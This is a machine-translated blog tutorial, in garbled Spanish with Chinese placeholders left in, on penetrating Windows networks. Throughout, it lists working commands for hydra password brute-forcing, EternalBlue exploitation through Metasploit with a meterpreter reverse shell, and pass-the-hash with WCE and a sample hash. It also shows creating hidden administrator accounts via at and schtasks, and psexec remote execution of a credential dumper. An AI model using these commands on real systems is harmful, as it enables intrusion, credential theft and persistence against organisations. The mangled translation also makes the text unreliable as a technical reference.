La penetración de la red - de una manera convencional y las ideas impregnan (escaneo de puertos, escaneo de contraseña débil, ms17_010 uso, la inyección de hash, conexión remota y programa de ejecución ......)

port Scan

el puerto y el ataque común

método de exploración específica Haga clic aquí para ir a mi otro artículo, que detalla el uso de la herramienta de escaneo de puertos

escaneo contraseña débil

escaneo contraseña débil, por ejemplo, MySQL, VNC, RDP, http gestión y otras contraseñas débiles para iniciar sesión en el servicio, puede utilizar algunas de las herramientas de escaneo débiles contraseña, XSCAN, hidra, medusa, nmap y así sucesivamente. También puede encontrarse más y mejores herramientas

hidra

1. En primer lugar abierto que los puertos con nmap exploración

2. El uso de contraseña débil hidra puede escaneando el escaneo de puertos

hydra -L user.txt -P pass.txt 192.168.16.137(爆破的ip) smb(爆破的服务名)

 -l nombre de usuario especificado -L designado voladura de voladura voladuras nombre de usuario designado -p diccionario -P contraseña especifica la contraseña de voladura diccionario

guión nmap

guiones bajo el directorio de instalación namp: ruta del script

guión voladuras: bruta script de detección de la vulnerabilidad: VULN

uso

nmap -p 脚本正针对的端口 --script 脚本名 要攻击的ip

msfconsole

1. Entra en el msfconsole

2. Comprobar la vulnerabilidad de la escritura correspondiente disponibles

search 17_010

3. Salida algunos scripts exploración de vulnerabilidades

use auxiliary/scanner/

4. Uso de una máquina vulnerable a escanear el guión indicado en el segmento de red

use auxiliary/scanner/smb/smb_ms17_010 
set threads 10
set rhosts 要扫描的网段/24
exploit

5. Seleccione el dispositivo apropiado vulnerables a los ataques de exp

use exploit/windows/smb/ms17_010_eternalblue
set lhost 本机ip
set rhosts 要攻击的ip/32
set payload windows/x64/meterpreter/reverse_tcp
exploit

la inyección de hash

principio

principio de inyección de hash es que los usuarios locales o de dominio que hemos preparado un buen picadillo inyectado en marcha proceso de autenticación lsass.exe local del equipo de destino, de modo que es como si inician sesión en el equipo local al mismo uso del tiempo ipc sesión para aprovechar el equipo de destino autoridad. Para hash de equipo de destino de usuario local o de dominio cómo conseguirlo para reproducir su propia imaginación, el hash de inyección en sí con el fin de tratar con aquellos que no pueden agrietarse NTLM HASH

método

1. En primer lugar el uso WCE obtener un valor hash de la máquina dentro de la red, y no puede romperse demasiado complejo

wce -l

2. Debido al uso, contraseña de red muchas máquinas en muchos casos es el mismo (cuando el mismo valor hash de la contraseña es la misma)

3. En las otras máquinas de tratar de conseguir el hash al aterrizaje, el destino puede ser el mismo que si la contraseña de cuenta

1. Obtener el nombre de destino o nombre de dominio

ping -a 目标机ip

2. Antes de obtener el valor hash utilizando el aterrizaje, no hay sustituto ntlmhash disponible 0

wce.exe -s Administrator:WIN-P68FLB30G1I:B73A13E9B7832A35AAD3B435B51404EE:AFFFEBA176210FAD4628F0524BFE1942

3. El acceso remoto a la máquina de destino unidad C compartir archivos por defecto

dir \\目标机ip\c$

La placa objetivo 4. c asignado a la máquina local

net use z: \\目标机ip\c$

procedimientos de conexión y la ejecución remota

Agregar tarea programada

en las tareas programadas

prestar atención

Caso de uso: obtener la contraseña de cuentas de equipo de destino, pero no pueden conexión de escritorio remoto
necesidades para abrir el servicio Programador de tareas

1. El uso por defecto IPC $ compartió conexión remota a la máquina de destino

net use \\目标机ip /user:administrator 密码

2. Comprobar el tiempo objetivo

net time \\目标机ip

3. Añadir a la ejecución de tareas programadas

3.1 Ejecución de comandos directa

at \\目标机ip 时间 命令

Ejemplo:
Crear un usuario

at \\192.168.16.158 12:50 net user zs 123.com /add

Agregue el usuario al grupo de administradores

at \\192.168.16.158 12:50 localgroup administrators zs /add

3.2 utilizando un script

Crear un archivo bat, contenido para crear un nuevo usuario y añadirlo al grupo de administradores

Copiar el archivo a la máquina de destino bate

copy 1.bat \\目标机ip\c$\1.bat

Agregar tarea programada para ejecutar este script

at \\目标机ip 时间 脚本路径

 

4. Revisar el equipo de destino en una lista de todas las tareas

at \\192.168.16.158

Add schtasks ejecución de la tarea programada

Tenga en cuenta
el uso de la situación: para obtener la contraseña de cuentas de equipo de destino, pero pueden conexión de escritorio remoto no
necesita encender el sistema después de que el servicio Programador de tareas 2003 antes de poder utilizar

1. Crear un archivo bat, contenido para crear un nuevo usuario y agregarlo al grupo de administradores

2. El uso predeterminado IPC $ compartió conexión remota a la máquina de destino

net use \\目标机ip /user:administrator 密码

3. copiar el archivo en el bate equipo de destino

copy 1.bat \\目标机ip\c$\1.bat

4. Revisar el tiempo objetivo

net time \\目标机ip

5. Introduzca el siguiente comando schtasks Agregar tarea programada

schtasks /create /tn aa /tr 脚本路径 /sc once /st 时间 /S 目标机ip /U 用户名 /P 密码 /RU system

Plus sistema / RU se lleva a cabo por el sistema del usuario, también se puede quitar, la secuencia de comandos se puede sustituir con un solo comando camino

6. Plan de aplicación directa no es una ejecución de la tarea

schtasks /run /tn 计划任务名 /s 目标机ip /u 用户名 /p 密码 

7. Tareas programadas Eliminar

schtasks /F /delete /tn 计划任务名 /s 目标机ip /u 用户名 /p 密码 

la ejecución remota de psexec

1. El uso de software local de la carga remota al objetivo

net use \\目标机ip\c$ /user:administrator 密码
copy wce.exe \\目标机ip\c$\

2. Realizar programas locales de destino

PsExec.exe \\目标机ip –accepteula -u 用户 -p 密码 执行的程序

Jugará el primer cuadro Ejecutar, escriba -accepteula este parámetro puede pasar por alto

3. Use psexec propios parámetros locales del programa se cargan en el equipo de destino, eliminan automáticamente después de la ejecución

Psexec.exe \\目标机ip -u 用户 -p 密码 -c QuarksPwDump.exe -d

-c <[ruta] archivo>: copiar el archivo a la máquina remota y ejecutar (Nota: El archivo se elimina automáticamente después del final de la carrera)
-d está sin esperar a que el programa para regresar a fin

Publicado 66 artículos originales · ganado elogios 234 · Vistas a 30000 +

Supongo que te gusta

Origin blog.csdn.net/wsnbbz/article/details/105102705
Recomendado
Clasificación